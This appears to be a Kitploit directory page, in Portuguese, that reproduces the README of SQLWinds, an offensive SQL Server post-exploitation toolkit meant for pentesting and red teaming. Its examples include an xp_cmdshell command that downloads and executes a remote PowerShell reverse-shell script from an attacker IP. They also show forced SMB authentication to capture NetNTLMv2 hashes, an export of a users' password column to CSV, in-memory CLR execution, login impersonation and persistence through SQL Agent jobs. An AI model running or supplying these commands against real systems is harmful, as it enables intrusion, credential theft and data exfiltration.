Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
sqlwinds — SQLWinds - Kit de ferramentas de avaliação de segurança e pós-exploração do SQL Server | Kitploit
Ferramentas/GitHubGitHub/blue0x1/sqlwinds
Escalada de PrivilégiosMecanismos de PersistênciaExploraçãoMovimento LateralAuditoria de ConfiguraçãoExfiltração de DadosPós-ExploraçãoTestes de PenetraçãoRed TeamingSegurança de Banco de Dados
GitHubblue0x1/sqlwinds
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

sqlwinds

SQLWinds - Kit de ferramentas de avaliação de segurança e pós-exploração do SQL Server

Ver Repositório

SQLWinds

Kit de Avaliação de Segurança SQL e Pós-Exploração

SQLWinds é uma ferramenta de linha de comando para testes de segurança e exploração do Microsoft SQL Server. Ela fornece um ambiente interativo para analisar profundamente servidores, elevar privilégios, executar ataques e fazer pivô em redes, tudo com comandos especializados para tarefas como execução de código em memória e exploração de banco de dados SCCM.


SQLWinds


📖 Documentação e Recursos

Wiki Issues Releases

Links rápidos:

  • Documentação Completa e Wiki - Guia de uso completo e referência de comandos
  • Reportar um Problema - Encontrou um bug ou tem uma solicitação de recurso?
  • Última Versão - Baixe a versão mais recente

Recursos

  • Autenticação Diversificada: Suporta autenticação SQL, Integrada do Windows (--integrated) e delegação Kerberos (--kerberos com --user/--pass).
  • Enumeração Abrangente:
    • Informações do servidor, bancos de dados, tabelas, colunas, usuários e permissões.
    • Auditoria de configuração de segurança (xp_cmdshell, CLR, OLE, etc.).
    • Descoberta de dados sensíveis e extração de segredos.
    • Enumeração e exploração de servidores vinculados.
  • Pós-Exploração e Movimentação Lateral:
    • Execução de Código: Habilitar e usar xp_cmdshell, Procedimentos de Automação OLE (sp_oacreate) e integração CLR.
    • CLR em Memória: Carregar e executar assemblies .NET diretamente da memória sem gravar arquivos em disco (:memclr).
    • Roubo de Credenciais: Forçar autenticação SMB em um caminho UNC para ataques de relay (:unc_smb).
    • Interação com o Registro: Ler chaves e valores do registro via xp_regread.
    • Persistência: Criar, listar e executar Trabalhos do SQL Agent.

Instalação e Compilação

Compilação Rápida

O repositório inclui um script build.bat para compilação fácil no Windows:

root@kitploit:~
.\build.bat

O executável SQLWinds.exe compilado será colocado no diretório bin\Release\.

Compilação Manual

  1. Certifique-se de ter o .NET Framework (≥ 4.6.1) ou o .NET SDK instalado.
  2. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. Compile a solução:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

Uso

Conexão Básica

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

Opções Comuns de Linha de Comando

Modo REPL Interativo

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

Referência Completa de Comandos REPL

Exemplo: Usando :plain para Scripts Grandes

O comando :plain é essencial para executar scripts SQL grandes e multilinha.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. Digite :plain e pressione Enter.
  2. Cole ou digite seu script SQL completo.
  3. Em uma nova linha, digite :execute para executar o script inteiro ou :cancel para abortar.

Exemplos

1. Auditoria

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. Usando xp_cmdshell para Execução de Código

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. Execução CLR em Memória (Sem Arquivos)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. Roubando Hashes NetNTLMv2 via SRelay

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. Exploração do Banco de Dados SCCM

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. Exfiltração de Dados

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 Contribuição e Suporte

Aceitamos contribuições! Se você tem ideias de melhorias ou encontrar algum problema:

  1. Consulte a Wiki para documentação
  2. Pesquise nas Issues existentes para evitar duplicatas
  3. Crie uma nova issue com informações detalhadas sobre sua sugestão ou relatório de bug

⚠️ Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.


Créditos

Desenvolvido por blue0x1.

Baixar ferramenta
  • Exfiltração de Dados: Enviar/baixar arquivos e exportar resultados de consultas para CSV/JSON.
  • Interação com Banco de Dados SCCM: (Se o banco de dados alvo for SCCM)
    • Detectar SCCM e relatar informações de versão/site.
    • Inventariar hardware, software, coleções e implantações.
    • Realizar auditorias de segurança específicas do SCCM.
  • Análise Kerberos: Verificar no Active Directory os SPNs associados ao alvo para solucionar problemas de autenticação Kerberos.
  • Descoberta de Instâncias: Enumerar instâncias do SQL Server disponíveis no domínio.
  • REPL Avançado: Ambiente interativo com recurso de autocompletar e histórico de comandos.
  • OpçãoDescrição
    --serverServidor alvo (IP, hostname, instância). Obrigatório.
    --user, --passCredenciais para autenticação SQL ou Windows.
    --integratedUsar o token Windows atual para autenticação.
    --kerberosUsar o fluxo de autenticação Kerberos.
    --spn-checkVerificar no AD os SPNs do host alvo.
    --run-cmd "<SQL>"Executar um único comando SQL e sair.
    --run-file file.sqlExecutar um script SQL de um arquivo e sair.
    --infoColetar e exibir informações extensas do servidor.
    --getinstanceDescobrir instâncias SQL no domínio e sair.
    --list-dbsListar bancos de dados e sair.
    --security-auditRealizar auditoria de segurança e sair.
    ComandoDescriçãoExemplo
    :infoExibe informações detalhadas do servidor:info
    :dbsLista todos os bancos de dados com detalhes:dbs
    :tables [db] [schema]Lista tabelas no banco de dados/esquema:tables master dbo
    :columns <table> [schema] [db]Lista colunas de uma tabela:columns Users dbo MyDatabase
    :usersLista todos os logins SQL e usuários do banco de dados:users
    :permsExibe as permissões do usuário atual:perms
    :auditRealiza auditoria de configuração de segurança:audit
    :search [term]Pesquisa dados sensíveis:search password
    :secretsExtrai possíveis segredos:secrets
    :servicesExibe as contas de serviço do SQL Server:services
    :spnVerifica SPNs do host alvo:spn
    :enable_xp_cmdshellHabilita xp_cmdshell:enable_xp_cmdshell
    :disable_xp_cmdshellDesabilita xp_cmdshell:disable_xp_cmdshell
    :xp <command>Executa comando do SO via xp_cmdshell:xp whoami
    :enable_oleHabilita Automação OLE:enable_ole
    :disable_oleDesabilita Automação OLE:disable_ole
    :ole_cmd <command>Executa comando do SO via OLE:ole_cmd "calc.exe"
    :enable_clrHabilita integração CLR:enable_clr
    :disable_clrDesabilita integração CLR:disable_clr
    :deploy-clr <path>Implanta assembly CLR a partir de arquivo:deploy-clr C:\Tools\cmd.dll
    :list-assembliesLista assemblies CLR implantados:list-assemblies
    :clr_execExecuta um método CLR:clr_exec MyAssembly MyClass Method arg1
    :memclrExecuta assembly CLR a partir da memória:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>Remove um assembly CLR:remove-assembly MyAssembly
    :list_linkserversLista servidores vinculados:list_linkservers
    :linkrpc <srv> <cmd>Executa comando via servidor vinculado:linkrpc LINKEDSRV "whoami"
    :impersonate <login>Personifica um login SQL:impersonate sa
    :revertReverte o contexto de segurança:revert
    :agent_jobGerencia trabalhos do SQL Agent:agent_job create MyJob "whoami"
    :ls [path]Lista diretório via SQL:ls C:\Windows\Temp
    :unc_smb <path>Força autenticação SMB para UNC:unc_smb \\192.168.1.100\share
    :plainCole scripts SQL grandes(Veja exemplo abaixo)
    :regreadLê valor do registro:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allLista todos os valores em uma chave:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadEnvia arquivo para tabela:upload C:\file.txt MyTable
    :downloadBaixa binário a partir de consulta:download "SELECT file FROM blobs" out.bin
    :exportcsvExporta consulta para CSV:exportcsv "SELECT * FROM users" out.csv
    :exportjsonExporta consulta para JSON:exportjson "SELECT * FROM users" out.json
    :sccm_infoDetecta banco de dados SCCM:sccm_info
    :sccm_inventoryExibe inventário SCCM:sccm_inventory
    :sccm_collectionsLista coleções SCCM:sccm_collections "All Systems"
    :sccm_deploymentsExibe implantações:sccm_deployments
    :sccm_clientsLista clientes:sccm_clients inactive
    :sccm_auditAuditoria de segurança SCCM:sccm_audit
    :sccm_applicationExibe detalhes do aplicativo:sccm_application "Google Chrome"
    helpExibe ajudahelp
    exitSai do REPLexit